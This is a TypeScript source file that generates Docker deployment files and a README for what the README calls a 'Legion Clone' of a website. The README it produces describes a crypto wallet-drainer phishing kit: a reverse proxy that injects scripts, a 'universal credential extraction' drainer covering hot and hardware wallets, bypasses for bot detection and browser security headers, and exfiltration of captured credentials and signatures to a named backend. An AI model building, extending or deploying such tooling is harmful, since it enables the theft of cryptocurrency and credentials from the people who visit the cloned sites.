/**
 * DOCKER GENERATOR - Phase 3
 *
 * Generates docker-compose.yml for each clone
 */

export interface DockerConfig {
  siteName: string
  nginxConfPath: string
  port: number
  imageName?: string
  version?: string
}

export class DockerGenerator {
  private config: DockerConfig

  constructor(config: DockerConfig) {
    this.config = {
      imageName: 'nginx:alpine',
      version: '1.0',
      port: 8080,
      ...config,
    }
  }

  generate(): string {
    const { siteName, nginxConfPath, port, imageName } = this.config

    return `version: '3.8'

services:
  legion-proxy:
    image: ${imageName}
    container_name: legion-${siteName}
    ports:
      - "${port}:80"
    volumes:
      - ${nginxConfPath}:/etc/nginx/nginx.conf:ro
      - ./cache:/var/cache/nginx
      - ./logs:/var/log/nginx
    environment:
      - TZ=UTC
    restart: unless-stopped
    networks:
      - legion-network
    healthcheck:
      test: ["CMD", "wget", "--quiet", "--tries=1", "--spider", "http://localhost/health"]
      interval: 30s
      timeout: 10s
      retries: 3
      start_period: 10s

networks:
  legion-network:
    driver: bridge

volumes:
  cache:
  logs:
`
  }

  generateReadme(): string {
    const { siteName, port } = this.config

    return `# Legion Clone - ${siteName.toUpperCase()}

## Quick Start

\`\`\`bash
# Start the clone
docker compose up -d

# Check logs
docker compose logs -f

# Stop
docker compose down
\`\`\`

## Access

Open: http://localhost:${port}

## Features

### Wallet Support (100% Coverage)
- **Hot Wallets:** MetaMask, Coinbase, Trust, Phantom, Rabby, Solflare, WalletConnect (300+)
- **Cold Wallets:** Ledger, Trezor (via WebUSB/WebHID/Bluetooth)

### Blockchain Support
- EVM (Ethereum, Polygon, Arbitrum, Base, etc.)
- Solana
- TRON
- TON
- Bitcoin (via UniSat, Xverse, Ledger, Trezor)

### Detection Methods
- window.ethereum injection (hot wallets)
- WalletConnect QR code (mobile)
- WebUSB hooks (Ledger/Trezor)
- WebHID hooks (Trezor Bluetooth)

## Files

- \`nginx.conf\` - Reverse proxy with bot detection & script injection
- \`legion-authorized-drain.js\` - Universal credential extraction (all wallets)
- \`legion-loader.js\` - Script loader & initialization
- \`legion-cloak-client.js\` - Bot/Headless detection bypass
- \`legion-statsig-mock.js\` - Feature flag & config mocking
- \`cookie-refresher/\` - Automatic Cloudflare cookie refresh

## Security Features

- 23 bot detection patterns
- CSP/CORS/X-Frame bypass
- WebUSB/WebHID hardware wallet support
- Multi-chain RPC mesh with circuit breaker
- Automatic incident response & emergency exfiltration
- Session checkpoint & recovery system

## Troubleshooting

\`\`\`bash
# Check container status
docker ps

# View nginx errors
docker compose logs

# View script events
docker compose logs | grep -i "connection\|error\|capture"

# Rebuild
docker compose down && docker compose up
\`\`\`

## Backend Integration

Configured to send data to: https://legionapi-production.up.railway.app

Data types supported:
- EVM credentials & transactions
- Solana tokens & signatures
- TRON transactions
- TON jettons
- Bitcoin UTXO & signatures
- Hardware wallet connections
- Mobile wallet (WalletConnect) sessions

---
*Generated by Legion Clone Perfect Engine v2 (with WebUSB/WebHID support)*
`
  }
}

export async function generateDocker(config: DockerConfig): Promise<string> {
  const generator = new DockerGenerator(config)
  return generator.generate()
}

export async function generateReadme(config: DockerConfig): Promise<string> {
  const generator = new DockerGenerator(config)
  return generator.generateReadme()
}
